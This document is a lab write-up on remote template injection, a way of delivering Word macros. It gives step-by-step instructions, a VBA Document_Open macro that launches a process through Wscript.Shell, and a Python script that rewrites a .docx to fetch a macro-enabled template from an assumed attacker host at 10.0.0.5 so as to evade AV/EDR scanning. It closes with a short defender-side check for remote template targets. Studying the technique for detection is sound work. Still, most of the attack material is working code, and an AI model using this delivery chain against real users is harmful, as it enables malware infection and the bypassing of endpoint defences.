This lab shows how a macro payload can be delivered through a .docx file indirectly: the document itself carries no VBA, only a reference to a remote template that does, which gives it a good chance of evading some AVs/EDRs that inspect the .docx for embedded macros.
This technique works in the following way:
1. A malicious macro is saved in a Word template (.dotm) file.
2. A benign .docx file is created from one of the default MS Word document templates.
3. The document from step 2 is saved as .docx.
4. The document from step 3 is renamed to .zip.
5. The archive from step 4 is unzipped.
6. `.\word\_rels\settings.xml.rels` contains an `attachedTemplate` relationship pointing at the template the document was created from. That reference gets replaced with a reference to the malicious .dotm created in step 1. The .dotm can be hosted on a web server (HTTP) or on a WebDAV/SMB share (UNC path).
7. The files are zipped back up and the archive is renamed to .docx. When the document is opened, Word fetches the template from the remote location and loads its macros.
Alt+F8 opens the Macros dialog (Alt+F11 opens the VBA editor directly); select ThisDocument and paste in the macro, then save the file as a Word Macro-Enabled Template (.dotm). The page shows only the shell-object line; the surrounding Document_Open handler and the calc.exe payload below are assumptions added to make it a complete, runnable lab macro:

```vba
Sub Document_Open()
    ' Runs when the document (and therefore the attached template) is opened
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "calc.exe"   ' placeholder payload, assumed for the lab
End Sub
```
Create a benign .docx file from one of the provided templates and save it as legit.docx:
Rename legit.docx to legit.zip:
Unzip the archive and edit `word\_rels\settings.xml.rels`, replacing the `Target` of the `attachedTemplate` relationship with the URL (or UNC path) of the hosted .dotm:
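Steps 4 to 7 can be scripted instead of done by hand, since a .docx is just a zip. The following is an added example written for this page, not code from the lab itself: it builds a constructed, minimal stand-in for legit.docx (real documents from Word contain many more parts), rewrites the `attachedTemplate` relationship in `word/_rels/settings.xml.rels` to point at an attacker-hosted .dotm, and includes the defender-side check that lists where a document will fetch its template from. The URL `http://10.0.0.5/legit.dotm` and the local template path are assumptions; the relationship namespace and type are fixed by the OOXML specification.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace and relationship type fixed by ECMA-376 (OOXML); not assumptions.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"
XML_DECL = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
ET.register_namespace("", REL_NS)  # serialise with a default xmlns, as Word writes it

# Assumed local template path, in the form Word records when a document is
# created from a template (file:/// URI, TargetMode="External").
LOCAL_TEMPLATE = ("file:///C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\"
                  "Polished%20resume.dotx")

# Constructed stand-in for legit.docx: only the parts needed to show the rewrite.
SAMPLE_PARTS = {
    "[Content_Types].xml": XML_DECL + (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/></Types>'),
    "word/document.xml": XML_DECL + (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body/></w:document>'),
    # settings.xml only names the relationship id; the real target lives in the .rels part
    "word/settings.xml": XML_DECL + (
        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<w:attachedTemplate r:id="rId1"/></w:settings>'),
    SETTINGS_RELS: XML_DECL + (
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{LOCAL_TEMPLATE}" TargetMode="External"/></Relationships>'),
}


def build_sample_docx() -> bytes:
    """Zip the constructed parts into a minimal .docx (a .docx is just a zip)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in SAMPLE_PARTS.items():
            z.writestr(name, xml)
    return buf.getvalue()


def rewrite_template_target(rels_xml: bytes, new_target: str) -> tuple:
    """Point every attachedTemplate relationship at new_target; return (xml, count)."""
    root = ET.fromstring(rels_xml)
    changed = 0
    for rel in root.findall(f"{{{REL_NS}}}Relationship"):
        if rel.get("Type") == ATTACHED_TEMPLATE:
            rel.set("Target", new_target)
            rel.set("TargetMode", "External")  # a URL/UNC target must be external
            changed += 1
    return (XML_DECL + ET.tostring(root, encoding="unicode")).encode("utf-8"), changed


def inject_remote_template(docx: bytes, template_url: str) -> bytes:
    """Steps 4 to 7 of the lab in one pass: unzip, edit settings.xml.rels, re-zip."""
    src = zipfile.ZipFile(io.BytesIO(docx))
    if SETTINGS_RELS not in src.namelist():
        raise ValueError("no settings.xml.rels: create the .docx from a template first")
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == SETTINGS_RELS:
                data, n = rewrite_template_target(data, template_url)
                if n == 0:
                    raise ValueError("no attachedTemplate relationship found")
            dst.writestr(info.filename, data)  # every other part is copied unchanged
    return out.getvalue()


def attached_template_targets(docx: bytes) -> list:
    """Defender-side check: list where this document will fetch its template from."""
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        if SETTINGS_RELS not in z.namelist():
            return []
        root = ET.fromstring(z.read(SETTINGS_RELS))
    return [rel.get("Target") for rel in root.findall(f"{{{REL_NS}}}Relationship")
            if rel.get("Type") == ATTACHED_TEMPLATE]


def is_remote_target(target: str) -> bool:
    """True for http(s) URLs and UNC/WebDAV paths such as \\\\host\\share\\x.dotm."""
    return re.match(r"(?i)^(https?://|\\\\)", target) is not None


def part_names(docx: bytes) -> list:
    """Sorted list of parts in the archive, to confirm nothing else was touched."""
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        return sorted(z.namelist())


if __name__ == "__main__":
    payload_url = "http://10.0.0.5/legit.dotm"  # assumed attacker-hosted .dotm
    weaponised = inject_remote_template(build_sample_docx(), payload_url)
    for target in attached_template_targets(weaponised):
        kind = "REMOTE" if is_remote_target(target) else "local "
        print(f"{kind} template -> {target}")
```

The only part that changes is `settings.xml.rels`; `document.xml` and the rest of the archive are copied byte for byte, which is why a scanner that only looks for `vbaProject.bin` inside the .docx sees nothing. `attached_template_targets` plus `is_remote_target` is the corresponding check a triage script should run on inbound Office documents: an `attachedTemplate` relationship whose target is an http(s) URL or a UNC path is the artefact this technique leaves behind.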